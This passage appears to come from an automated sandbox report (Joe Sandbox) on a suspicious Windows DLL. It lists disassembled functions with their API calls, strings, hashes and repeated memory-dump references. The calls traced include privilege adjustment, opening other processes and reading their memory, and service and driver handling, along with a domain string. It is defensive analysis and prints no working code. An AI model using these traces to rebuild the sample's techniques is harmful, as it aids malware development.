                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$Service$Open$CloseCopyCreateDirectoryErrorFileHandleLastLibraryLoadManagerWindows_strncpywsprintf
                                                                                                                                      • String ID: %s\SysWOW64\%s.sys$C:\Windows\System32\drivers\wimmount.sys
                                                                                                                                      • API String ID: 3980169130-1479437390
                                                                                                                                      • Opcode ID: 4d3e5e57d6d27dbdd66d3fd040c53c9de42df835c0a25e375a2bd3066520f142
                                                                                                                                      • Instruction ID: 730a925c01bdac3e1af2705830bad0513e3e850aee1612c3c45734736bd1b801
                                                                                                                                      • Opcode Fuzzy Hash: 4d3e5e57d6d27dbdd66d3fd040c53c9de42df835c0a25e375a2bd3066520f142
                                                                                                                                      • Instruction Fuzzy Hash: 5B41D675648344ABE320CBB49E85FAFB3EEAF85344F50482DF65D82141EB75D90887A2
                                                                                                                                      Function 69E81B80 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 95COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugOutputString$__wfopen_s_memset_strncpy
                                                                                                                                      • String ID: C:\pl.txt
                                                                                                                                      • API String ID: 3727115324-85274317
                                                                                                                                      • Opcode ID: 758053a721b6e170728602df44313dfa6b1d1977fc01c69594b1fdfc4c2ef9e7
                                                                                                                                      • Instruction ID: 3e9451b925b2d987c38c811fd37536952fb1087a167f8668238cccda2c98af02
                                                                                                                                      • Opcode Fuzzy Hash: 758053a721b6e170728602df44313dfa6b1d1977fc01c69594b1fdfc4c2ef9e7
                                                                                                                                      • Instruction Fuzzy Hash: AB2146356042126BD304DBA89E19FAFB7949FC1748F74D808F8A89B204EB31E40987D2
                                                                                                                                      Function 69EA1830 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 82COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69E9CCF0: RtlAdjustPrivilege.NTDLL ref: 69E9CD1C
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CD5C
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CD7F
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDA7
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDC0
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDD7
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE00
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE13
                                                                                                                                      • ReadProcessMemory.KERNEL32 ref: 69EA18E4
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 69EA1920
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Memory$ProcessVirtual$AllocateInformationOpenQuerySystem$AdjustCloseFreeHandlePrivilegeRead
                                                                                                                                      • String ID: 6$=$e$i$n$o$r$s$v
                                                                                                                                      • API String ID: 3726627124-2946980317
                                                                                                                                      • Opcode ID: 3e7a49dfc3fdacbabaf839ec6af416661940fee1490892ba2bb10d1b9fe8bb22
                                                                                                                                      • Instruction ID: 927fc832a375c3edc526b7b61e28c381181ef8323b951396ce06a1bdb82a8ea6
                                                                                                                                      • Opcode Fuzzy Hash: 3e7a49dfc3fdacbabaf839ec6af416661940fee1490892ba2bb10d1b9fe8bb22
                                                                                                                                      • Instruction Fuzzy Hash: FE31AE3160D3C09ED302CF28848069FBFE2AFAA208F48499DF1D99B242D265D649C767
                                                                                                                                      Function 69E84860 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 78sleepCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69E9D210: _memset.LIBCMT ref: 69E9D237
                                                                                                                                        • Part of subcall function 69E9D210: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 69E9D242
                                                                                                                                        • Part of subcall function 69E9D210: Process32First.KERNEL32 ref: 69E9D25C
                                                                                                                                        • Part of subcall function 69E9D210: Process32Next.KERNEL32(00000000,00000002), ref: 69E9D271
                                                                                                                                        • Part of subcall function 69E9D210: CloseHandle.KERNEL32(00000000,00000000,00000002), ref: 69E9D27B
                                                                                                                                      • _strncmp.LIBCMT ref: 69E84892
                                                                                                                                      • _strncmp.LIBCMT ref: 69E848B0
                                                                                                                                      • _strncmp.LIBCMT ref: 69E848CA
                                                                                                                                      • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?,00000000,?,?), ref: 69E848DB
                                                                                                                                        • Part of subcall function 69E9D210: CloseHandle.KERNEL32(00000000), ref: 69E9D2A0
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E848F5
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDEDFC), ref: 69E8490F
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E84916
                                                                                                                                        • Part of subcall function 69E84780: OpenFileMappingA.KERNEL32(000F001F,00000000,?), ref: 69E847DE
                                                                                                                                        • Part of subcall function 69E84780: __wfopen_s.LIBCMT ref: 69E847F7
                                                                                                                                        • Part of subcall function 69E84780: OutputDebugStringA.KERNEL32(OpenFileMapping failed,76230F00,?,?,?,?,?,?,?,?,?,?,69E84885,?,00000000,?), ref: 69E84811
                                                                                                                                        • Part of subcall function 69E84780: OutputDebugStringA.KERNEL32(69EDE1DC,?,?,?,?,?,?,?,?,?,?,69E84885,?,00000000,?,?), ref: 69E84818
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugOutputString$_strncmp$CloseHandleProcess32__wfopen_s$CreateFileFirstMappingNextOpenSleepSnapshotToolhelp32_memset
                                                                                                                                      • String ID: C:\pl.txt$|OK2|$|OK3|$|OK|
                                                                                                                                      • API String ID: 1832730099-1708107098
                                                                                                                                      • Opcode ID: f031111da131d81164811171c634d6ba34ac004bdad6bae6c897d7c0e91fdbe6
                                                                                                                                      • Instruction ID: c21bd545cdf794a86d94ee5ef295e478d3734d734f6bde220b703865d8fbac79
                                                                                                                                      • Opcode Fuzzy Hash: f031111da131d81164811171c634d6ba34ac004bdad6bae6c897d7c0e91fdbe6
                                                                                                                                      • Instruction Fuzzy Hash: D511277AA0020527DB10EBB5AE05B6EB39CEB45228F20881BFE1C97280FB75E515C6D1
                                                                                                                                      Function 69E9EB50 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 185fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,69E9F4D2), ref: 69E9EB65
                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,69E9F4D2), ref: 69E9EB75
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,69E9F4D2), ref: 69E9EB83
                                                                                                                                      • _malloc.LIBCMT ref: 69E9EB94
                                                                                                                                      • CloseHandle.KERNEL32(00000000,69E9F4D2), ref: 69E9EBA3
                                                                                                                                      • _memset.LIBCMT ref: 69E9EBB7
                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,000003E8,?,00000000,?,?,?,69E9F4D2), ref: 69E9EBCD
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,69E9F4D2), ref: 69E9EBD4
                                                                                                                                        • Part of subcall function 69EC0763: __lock.LIBCMT ref: 69EC0781
                                                                                                                                        • Part of subcall function 69EC0763: ___sbh_find_block.LIBCMT ref: 69EC078C
                                                                                                                                        • Part of subcall function 69EC0763: ___sbh_free_block.LIBCMT ref: 69EC079B
                                                                                                                                        • Part of subcall function 69EC0763: RtlFreeHeap.NTDLL(00000000,?,69EE8B60,0000000C,69EC7D3E,00000000,69EE8F08,0000000C,69EC7D78,?,?,?,69ED1AC7,00000004,69EE9288,0000000C), ref: 69EC07CB
                                                                                                                                        • Part of subcall function 69EC0763: GetLastError.KERNEL32(?,69ED1AC7,00000004,69EE9288,0000000C,69EC8E49,?,?,00000000,00000000,00000000,?,69EC77E5,00000001,00000214), ref: 69EC07DC
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseFileHandle$CreateErrorFreeHeapLastReadSize___sbh_find_block___sbh_free_block__lock_malloc_memset
                                                                                                                                      • String ID: PEC2^O$PEC2fO
                                                                                                                                      • API String ID: 357344292-458899985
                                                                                                                                      • Opcode ID: 6022e1e7d6ea4ce311c27b75994d15c0930487ce032fef2da437ad9faf8b2743
                                                                                                                                      • Instruction ID: 0f042afd4731ce152eaa00c858c218bae5a51cfd59844236cc4aac2fd5f9bc65
                                                                                                                                      • Opcode Fuzzy Hash: 6022e1e7d6ea4ce311c27b75994d15c0930487ce032fef2da437ad9faf8b2743
                                                                                                                                      • Instruction Fuzzy Hash: 2D5157319189C01BF7224B2049967BE7B67BF03328F79496DE6D7AB381D713E5458381
                                                                                                                                      Function 69E9E9D0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 149fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,69E9F434), ref: 69E9E9E5
                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,69E9F434), ref: 69E9E9F5
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,69E9F434), ref: 69E9EA03
                                                                                                                                      • _malloc.LIBCMT ref: 69E9EA14
                                                                                                                                      • CloseHandle.KERNEL32(00000000,69E9F434), ref: 69E9EA23
                                                                                                                                      • _memset.LIBCMT ref: 69E9EA37
                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,000003E8,?,00000000,?,?,?,69E9F434), ref: 69E9EA4D
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,69E9F434), ref: 69E9EA54
                                                                                                                                        • Part of subcall function 69EC0763: __lock.LIBCMT ref: 69EC0781
                                                                                                                                        • Part of subcall function 69EC0763: ___sbh_find_block.LIBCMT ref: 69EC078C
                                                                                                                                        • Part of subcall function 69EC0763: ___sbh_free_block.LIBCMT ref: 69EC079B
                                                                                                                                        • Part of subcall function 69EC0763: RtlFreeHeap.NTDLL(00000000,?,69EE8B60,0000000C,69EC7D3E,00000000,69EE8F08,0000000C,69EC7D78,?,?,?,69ED1AC7,00000004,69EE9288,0000000C), ref: 69EC07CB
                                                                                                                                        • Part of subcall function 69EC0763: GetLastError.KERNEL32(?,69ED1AC7,00000004,69EE9288,0000000C,69EC8E49,?,?,00000000,00000000,00000000,?,69EC77E5,00000001,00000214), ref: 69EC07DC
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseFileHandle$CreateErrorFreeHeapLastReadSize___sbh_find_block___sbh_free_block__lock_malloc_memset
                                                                                                                                      • String ID: PEC2^O$PEC2|O
                                                                                                                                      • API String ID: 357344292-2876750026
                                                                                                                                      • Opcode ID: 752a4f973f5595ad86ce7a3e60f28a5eae5bf2c2402ad7423e124f23be32cc64
                                                                                                                                      • Instruction ID: 1e36a3d02b2099fadb10315db358a969229d9741ba711e6245db8717747ae58d
                                                                                                                                      • Opcode Fuzzy Hash: 752a4f973f5595ad86ce7a3e60f28a5eae5bf2c2402ad7423e124f23be32cc64
                                                                                                                                      • Instruction Fuzzy Hash: D041BD3191868027F3224A205D967BE7B67FF03329F78456DFAC7AA281E793E4458341
                                                                                                                                      Function 69EA0740 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 121fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,69EA08AF,?,?,?,?), ref: 69EA0756
                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00000000,?,69EA08AF,?,?,?,?), ref: 69EA076D
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,69EA08AF,?,?,?,?), ref: 69EA077E
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$CloseCreateHandleSize
                                                                                                                                      • String ID: Askm2com$www.Askm2.com
                                                                                                                                      • API String ID: 1378416451-731777296
                                                                                                                                      • Opcode ID: 4e31bd681f4ceaec1cd9eaed963b84c8433a87631b38fe4263a544ef42b5ebee
                                                                                                                                      • Instruction ID: eb6d4f7ec7d3a4bfae63364130e23ffb53f1296f67859131ab6924e96c3a081e
                                                                                                                                      • Opcode Fuzzy Hash: 4e31bd681f4ceaec1cd9eaed963b84c8433a87631b38fe4263a544ef42b5ebee
                                                                                                                                      • Instruction Fuzzy Hash: 13315A726051046FD7015634BC85BBF779DEB4333AF34462AF852CB181FB62880842A2
                                                                                                                                      Function 69E9E8D0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 93fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,69E9F48D), ref: 69E9E8E5
                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,69E9F48D), ref: 69E9E8F5
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,69E9F48D), ref: 69E9E903
                                                                                                                                      • _malloc.LIBCMT ref: 69E9E914
                                                                                                                                      • CloseHandle.KERNEL32(00000000,69E9F48D), ref: 69E9E923
                                                                                                                                      • _memset.LIBCMT ref: 69E9E937
                                                                                                                                      • SetFilePointer.KERNEL32(00000000,FFFFF830,00000000,00000002,?,?,?,69E9F48D), ref: 69E9E949
                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,000007D0,?,00000000,?,?,?,69E9F48D), ref: 69E9E95D
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,69E9F48D), ref: 69E9E964
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
